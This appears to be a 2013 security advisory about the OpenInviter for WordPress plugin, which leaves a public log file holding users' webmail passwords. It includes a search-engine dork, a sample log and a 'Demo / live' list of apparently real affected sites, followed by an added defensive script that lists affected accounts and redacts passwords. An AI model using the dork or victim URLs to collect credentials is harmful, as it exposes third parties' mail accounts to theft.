WordPress OpenInviter Information Disclosure

2013-01-07 / 2013-01-08
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##########################################################
# Title : OpenInviter for WordPress Discloses User Information
# Author : Ryuzaki Lawlet
# Blog : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: Sat Jan 5/2013 (5.47 pm)
# Vendor: http://wordpress.org/extend/plugins/openinviter-for-wordpress/
# Type : Web Apps
# Tested on : Ubuntu / Window XP
# Dork ; inurl:/OpenInviter/tmp/ & inurl:/OpenInviter/tmp/log_error.log
##########################################################

#--Info about OpenInviter for WordPress:
>> Allows your visitors to invite their contacts from Yahoo!, GMail, AOL, Hotmail and other providers to your blog.

Exploit:
Every user who logs in through this plugin gets a record written, including their email address and password, to the log_error file in the plugin's /tmp/ folder. That file is served from the web root, so it discloses the user's credentials for their main mail account at Yahoo!, GMail, AOL, Hotmail and other providers.

Example

[Years-month-day TIME] Local Debugger
----------DETAILS START----------
TRANSPORT: curl
SERVICE: hotmail
USER: victim@hotmail.com
PASSWORD: *********
STEPS:
initial_get :
URL: http://login.live.com/login.srf?id=2
METHOD: GET
RESPONSE: OK
login_post :
URL: https://login.live.com/ppsecure/post.srf?id=2&bk=1314918491
METHOD: POST
ELEMENTS: PPSX=Passp PwdPad= type= PPFT=ChJRMpJiZhTe4Z7X92sBFddI9M!tmfKtPFtflhAC1VeryloMgt7rVPjP6ADrF!rndQQRq2ZVzysXjuyAYS9NjIe5*OllJx!vK7xAU3ym0ZdKQakLQgOgVnTZn8N81jKUy00TaxC8acf!uMH!sH56Y3GputfpqyBGW1FwrNVFXvun2MwBOPUKs!mWshzl0CYxwuMyGG*0vC1yLpHNXZEgrN!7wezhHpooEH3Sox*ThDrs LoginOptions=3 login=victim@hotmail.com passwd=***********
RESPONSE: OK
first_redirect :
URL: http://www.hotmail.msn.com/cgi-bin/sbox?t=9ikSpGCZTCYwY3a5CuPibCZnDn3GN5e*OrIs5kzbdHvcgNQ610Cgps14x5lTVph*hWu0fdotwA4j7zZubNVU36uA0ag!cfBdMn9G!BcYoxELnC1Uue0m96tijFO744DPJy&p=9TSxWDG0OAapNedMZ1LMYVhOLboD26IovMvgl2rTjU5pSHOcPyYJWT8vdIcp7B0!9asl4R0AUTIXJnwxk7tqrNDQFa8jRiV7P3DsXuMRz4HrkvEmy3oX8VvFMHMhrOm0vX6C3OSrjvPpmuluxkGCAviJzvHjPDhT4YhLdhpNW0U4mVYL7rTKlTayPOqjGXnEAA&mkt=EN-US&lc=1033&id=2
METHOD: GET
RESPONSE: FAILED
----------DETAILS END----------

#--Demo / live
http://brXfo.com/cares/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://www.123eXloyee.com/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://realestatXegalopolis.com/in/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
http://www.learXssion.net/lp/wp-content/plugins/contest/OpenInviter/tmp/log_error.log
and many at google :v....

#----> Screenshot / Preview
http://i.imgur.com/tKILJ.png

#==================================================<Greet>==================================================#
# Sbkiller * Xay * HeavenSe7en * Lonely * Skiddo * Ben * DzDzul * Sykes * RedJohn * LodVViP * PhiberOptick #
# KedAns-Dz * r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) * NuxbieCyber ..all #
# CyberSec Crew * Cyber 4rmy * T3D Hacker * DevilSec * RileksCrew * TBD * Newbie3vilc063rs * MyHex * GaySec #
# www.1337day.com /.net /.org * packetstormsecurity.org * cxsecurity * All Security and Exploits #
#===========================================================================================================#
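For a site owner who finds this file on their own install, the useful first steps are to learn which accounts were written into it (so those users can be told to change their mail password) and to scrub the credential values before the file is retained as evidence. The script below is an added example, not code from the advisory or the plugin: it parses the DETAILS START/END block format shown above from a constructed sample log (with made-up passwords), returns the affected service/user pairs without ever storing the password, and redacts both the PASSWORD: line and the passwd= form field. The field names and block markers are taken from the excerpt in the advisory; the sample text itself is constructed.

```python
import re

# Constructed sample modelled on the log excerpt in the advisory.
# Passwords here are made up; this is not a real capture.
SAMPLE_LOG = """[2013-01-05 17:47:00] Local Debugger
----------DETAILS START----------
TRANSPORT: curl
SERVICE: hotmail
USER: victim@hotmail.com
PASSWORD: hunter2
STEPS:
initial_get :
URL: http://login.live.com/login.srf?id=2
METHOD: GET
RESPONSE: OK
login_post :
URL: https://login.live.com/ppsecure/post.srf?id=2
METHOD: POST
ELEMENTS: PPSX=Passp PwdPad= type= login=victim@hotmail.com passwd=hunter2
RESPONSE: OK
----------DETAILS END----------
[2013-01-06 09:12:00] Local Debugger
----------DETAILS START----------
TRANSPORT: curl
SERVICE: gmail
USER: someone@gmail.com
PASSWORD: s3cret
STEPS:
----------DETAILS END----------
"""

# One DETAILS block per login attempt, delimited by the markers seen in the advisory.
BLOCK_RE = re.compile(r"-+DETAILS START-+\n(.*?)-+DETAILS END-+", re.S)

# Only these header fields are kept; the password value is never copied out.
KEEP_FIELDS = ("TRANSPORT", "SERVICE", "USER")


def parse_entries(log_text):
    """Return one dict per DETAILS block: transport, service, user and whether
    a non-empty PASSWORD: line was present (the value itself is not retained)."""
    entries = []
    for match in BLOCK_RE.finditer(log_text):
        body = match.group(1)
        fields = {}
        for line in body.splitlines():
            key, sep, value = line.partition(":")
            if sep and key.strip() in KEEP_FIELDS:
                fields[key.strip().lower()] = value.strip()
        fields["has_password"] = bool(re.search(r"^PASSWORD:[ \t]*\S", body, re.M))
        entries.append(fields)
    return entries


def affected_accounts(log_text):
    """Sorted, de-duplicated 'service:user' pairs whose credentials were logged."""
    pairs = {
        f"{e.get('service', '?')}:{e.get('user', '?')}"
        for e in parse_entries(log_text)
        if e["has_password"]
    }
    return sorted(pairs)


def redact(log_text):
    """Replace credential values with a placeholder so the file can be kept as
    evidence: the PASSWORD: header line and any passwd= form field in ELEMENTS."""
    text = re.sub(r"(?m)^(PASSWORD:[ \t]*).*$", r"\1[REDACTED]", log_text)
    text = re.sub(r"(passwd=)\S+", r"\1[REDACTED]", text)
    return text


if __name__ == "__main__":
    # Usage on a real install: read wp-content/plugins/<plugin>/OpenInviter/tmp/log_error.log
    # (path is the plugin's own, per the advisory) instead of SAMPLE_LOG.
    for account in affected_accounts(SAMPLE_LOG):
        print("notify:", account)
    print(redact(SAMPLE_LOG))
```

Beyond triage, the fix is to stop the debugger from writing credentials at all and to keep the plugin's tmp directory out of the served tree (or deny it in the web server configuration); this script only handles the log that already exists.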

References:

http://wordpress.org/extend/plugins/openinviter-for-wordpress/

